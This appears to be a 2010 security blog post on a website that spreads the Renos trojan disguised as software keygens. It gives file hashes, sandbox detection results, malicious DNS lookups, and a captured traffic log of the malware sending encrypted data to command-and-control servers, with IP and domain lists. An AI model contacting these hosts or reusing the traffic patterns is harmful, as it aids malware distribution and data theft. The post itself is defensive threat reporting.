Free download cracked software with surprise

We have logged another website used to capture keywords related to software and to spread Renos trojan and other dangerous threats as execuable files of software cracks and keygens. The website uses blackhat seo strategies to attract most users possibles and to appear in the first pages of search engines.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that everytime we tried to download the infected file, it had always a different md5 checksum hash. This means that most probably the payload is created on-the-fly or there are various executable versions of the malware stored in the server, that are downloaded randomly. Is possible this is done to make sure the website distributes always an up-to-date malware executable, and so not detected by security software.

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net .....
mydynatri .net .....
zoozus .com .....
threezio .com .....
sina.com .cn .....
waytoall .com .....
topdworld .com .....
thevehic .com .....
ad.tlvmedia .com .....

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware looks like to have posted, with the method “POST”, a lot of encrypted data to various website urls and at the end it received commands to visit some advertisement links.

Domaind & IP Analysis:

sotapartners.net174.123.211.138 – AS: 21844
data-mortgage.com78.46.76.170 – AS: 24940
megadataonline.net64.191.16.70 – AS: 21788
mydynatri.net77.78.248.84 – AS: 42560
zoozus.com85.234.190.47 – AS: 6851
threezio.com77.78.239.42 – AS: 42560
waytoall.com96.9.157.39 – AS: 21788
topdworld.com173.212.250.130 – AS: 21788
thevehic.com173.212.245.243 – AS: 21788
ad.tlvmedia.com217.163.21.37 – AS: 42173

Other suspicious domains hosted in 64.191.16.70:

brodiero.com64.191.16.70 – AS: 21788
megadatacentral.net64.191.16.70 – AS: 21788
megadataonline.net64.191.16.70 – AS: 21788
spiderfile.net87.255.51.229 – AS: 38930

Other suspicious domains hosted in 85.234.190.47:

chattertune.net85.234.190.47 – AS: 6851
mybubblebean.com – – – AS: NA
roonotimex.com85.234.190.47 – AS: 6851